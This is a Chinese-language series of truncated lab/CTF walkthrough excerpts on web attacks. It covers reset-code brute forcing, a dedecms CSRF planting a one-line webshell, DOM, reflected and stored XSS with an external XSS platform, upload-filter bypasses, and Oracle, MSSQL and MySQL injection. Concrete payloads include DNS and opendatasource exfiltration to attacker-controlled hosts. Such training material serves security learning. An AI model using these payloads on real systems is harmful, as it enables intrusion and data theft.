11.1、密码找回
首先我们进入靶场 可以看到这个是一个cms搭建的网站 通过靶场提示我们找到后台找回密码的界面在这里我们随便重置一个密码 认证码这个的话通过源码审计可以得知是一个10-10000之间的数字 那这里我们可以通过抓包工具爆破模块进行不断的抓包爆破都设置好了以后开始跑 静静的等待密码重置就可以了 重置好密码以后 登录进后台找到flag~
CSRF跨站
这是一个dedecms的漏洞,我们可以去网上审计一下这种漏洞后发现 sys_verifies.php? 这个参数他会写入inc文件下面,那么就是我们可以控制的参数了首先我们访问网站后台http://120.203.13.75:8123/csrf/uploads/dede/然后构造我们的一句话木马 getfiles&refiles[0]=123&re
DOM型XSS
DOM型的本质其实也是反射型XSS个人感觉区别在于DOM型可以当前改变用户的DOM结构,反射型会传到服务器去,不过都是一次性的。做XSS的话我们需要按F12审计页面的HTML架构,对该闭合的地方做好相应的闭合。首先我们进入靶场在URL输入 ")<script>alert'123'</script><script>
存储XSS
XSS的本质就是用户的输入输出被当成前端JS代码执行了,那么存储型和其他XSS区别在于他会储存到服务器里面去,危害是XSS中最大的。我们首先需要一个XSS平台http://xss.tf/index.php?do=login这个平台可以帮我们做出很多的JS功能,我们只要把JS语句插进去那么就可以无所不能。只要JS能实现的,在这里我们都可以实现。靶场的话可以百度查找cms通杀漏洞找到之后我们可以插入自
xss反射型
反射型XSS其实也是对用户的输入输出没有做过滤。首先我们如果发现一个可能存在XSS漏洞的地方,我们可以加上">来闭合前面的标签不过在这里我们要先按F12来看网站的HTML结构做相应的调整,每个站都是不同的,不会存在万能的xss代码,所以我们还是要通过不断的修改payload来验证自己的想法。很正常,在这个靶场是不适合" 这边后台会有过滤,那么这个时候我们可以尝试用&nbs
文件上传漏洞
靶场第一关 这一关是前端白名单验证 主要使用抓包工具将发送的图片后缀修改一下即可~第二关 是检查文件类型 此关可以用两种方式 第一种就是上传图片码直接骗过验证 第二种依然可以用抓包来修改图片格式 但是建议前者会比较容易 后者曾经发生过一些意外事故第三关黑名单绕过 这关完全可以将后缀改成php2 php3 等多种后缀 同样可以被php解析而且可以绕过黑名单第四关.htaccess
Oracle注入- 报错注入
Oracle注入和mysql注入区别在于一些语句不同比如联合查询不能用123查询 中间需要用NULL隔开查表?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))--+ 查列然后一个一个找?id=1'
5.3.1、MSSQL注入 - 反弹注入
反弹注入这个需要注册一个自己的主机并且创建数据库进行注入利用函数opendatasource() 将flag导入到你的数据库 opendatasource()的意思就是可以将目标数据的库 表 字段都导入到你的目标的数据库 只要利用其它平台一些免费的数据库既可导入到此数据库中 那么表和字段flag都可以导入进来
5.2.2、MYSQL 注入 - Dns注入
首先需要有一个DNS平台 然后开始注入爆库/1.txt?id=1 and (SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.45 xxx.xxxx.io\\abc')))%23爆表/1.txt?id=1 and (SELECT LOAD_FILE(CONCAT('\\\\',(select t
5.2.1、MYSQL 注入 - 全方位利用
这课简单的注入方式、查字段?id=1 and 1=1 order by 2爆库?id=1 and 1=2 union select 1,database() maoshe爆表?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='mao